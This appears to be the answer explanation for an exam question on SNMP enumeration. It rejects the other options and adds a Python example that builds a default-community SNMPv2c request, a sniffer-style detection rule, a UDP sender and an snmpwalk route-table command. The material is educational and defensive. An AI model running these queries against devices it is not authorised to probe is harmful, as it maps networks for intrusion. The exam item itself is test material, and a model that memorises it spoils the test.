SNMP enumeration is a reconnaissance technique in which attackers query network devices such as routers, switches, firewalls, and servers using the Simple Network Management Protocol. When SNMP is misconfigured, such as using default or guessable community strings like "public" or "private", an attacker can read extensive system details. Retrieved information may include routing tables, ARP caches, interface statistics and addresses, listening TCP/UDP endpoints and active connections, running processes and installed software (Host Resources MIB), SNMP configuration parameters, and detailed device descriptions. This intelligence helps attackers map network topology, understand device roles, identify potential misconfigurations, and plan more advanced attacks such as traffic redirection, denial-of-service, or credential harvesting. A write community (often "private" by default) is worse still, since it allows the attacker to change the configuration rather than just read it. SNMP enumeration is dangerous because administrators often forget to secure SNMPv1 and SNMPv2c, both of which lack encryption and rely solely on a cleartext community string for authentication, so the string can also be sniffed from legitimate polling traffic. If left exposed, attackers can gather sensitive routing information without exploiting any software vulnerability. The remedy is SNMPv3 with authentication and privacy (authPriv), non-default community strings where v1/v2c cannot be retired, and access lists restricting UDP/161 to the management stations.

A SYN flood, option B, is a resource-exhaustion attack that overwhelms a server’s TCP connection table by sending numerous SYN packets without completing the handshake. It does not retrieve routing information.

DNS amplification, option C, leverages open DNS resolvers to magnify response traffic toward a victim, causing a volumetric denial-of-service attack. It is unrelated to device enumeration or routing data extraction.

Slowloris, option D, targets web servers by keeping numerous HTTP connections open and incomplete, causing resource exhaustion. It also does not expose routing information.

Therefore, SNMP enumeration is the correct answer because it specifically exploits poorly secured SNMP services to gather sensitive routing and configuration data.
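
As an added example (not from the original question set), the block below encodes an SNMPv2c GetRequest for sysDescr.0 and the next hop of the default route, then parses the same datagram the way a passive sniffer would to show the community string sitting in cleartext and flag a default one. The BER encoder and decoder are written inline so nothing has to be installed; `send_get` uses a plain UDP socket and is included for completeness but is not exercised here, since it needs a reachable agent. The OIDs are standard MIB-II values; the community strings are constructed for the example.

```python
import socket
import struct

DEFAULT_COMMUNITIES = {"public", "private"}
SYS_DESCR_0 = "1.3.6.1.2.1.1.1.0"                            # MIB-II sysDescr.0: vendor/OS/version
IP_ROUTE_NEXT_HOP_DEFAULT = "1.3.6.1.2.1.4.21.1.7.0.0.0.0"   # MIB-II ipRouteNextHop for route 0.0.0.0


def ber_len(n: int) -> bytes:
    if n < 128:
        return bytes([n])
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(raw)]) + raw


def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(body)) + body


def ber_int(v: int) -> bytes:
    """Non-negative INTEGER; the extra byte keeps values with the top bit set positive."""
    return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big"))


def ber_oid(oid: str) -> bytes:
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128 with continuation bits."""
    parts = [int(p) for p in oid.split(".")]
    body = bytearray([parts[0] * 40 + parts[1]])
    for p in parts[2:]:
        enc = [p & 0x7F]
        p >>= 7
        while p:
            enc.insert(0, 0x80 | (p & 0x7F))
            p >>= 7
        body += bytes(enc)
    return tlv(0x06, bytes(body))


def snmp_get_request(community: str, oids, request_id: int = 1) -> bytes:
    """SNMPv2c GetRequest. The community string is a plain OCTET STRING: no hashing, no encryption."""
    varbinds = tlv(0x30, b"".join(tlv(0x30, ber_oid(o) + tlv(0x05, b"")) for o in oids))
    pdu = tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0) + varbinds)   # GetRequest-PDU
    return tlv(0x30, ber_int(1) + tlv(0x04, community.encode()) + pdu)          # version 1 == v2c


def read_tlv(buf: bytes, pos: int):
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln


def peek_community(datagram: bytes):
    """What a sniffer on the wire sees: (version, community). SNMPv3 has no community field."""
    tag, body, _ = read_tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, ver, pos = read_tlv(body, 0)
    version = {0: "v1", 1: "v2c", 3: "v3"}.get(int.from_bytes(ver, "big"), "unknown")
    if version == "v3":
        return version, None
    _, community, _ = read_tlv(body, pos)
    return version, community.decode(errors="replace")


def flags_default_community(datagram: bytes) -> bool:
    """Detection rule: v1/v2c traffic authenticated with a default community string."""
    version, community = peek_community(datagram)
    return version in ("v1", "v2c") and community in DEFAULT_COMMUNITIES


def send_get(target: str, datagram: bytes, timeout: float = 2.0) -> bytes:
    """Send the request to UDP/161 and return the raw response (needs a reachable agent)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(datagram, (target, 161))
        return s.recv(65535)


if __name__ == "__main__":
    req = snmp_get_request("public", [SYS_DESCR_0, IP_ROUTE_NEXT_HOP_DEFAULT])
    print(req.hex())
    print(peek_community(req), "default community:", flags_default_community(req))
```

`snmpwalk -v2c -c public <device> 1.3.6.1.2.1.4.21` does the same thing at scale against the whole ipRouteTable; the hand-built encoder is here to make visible that the only thing standing between an attacker and that table is a string that often ships as "public".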
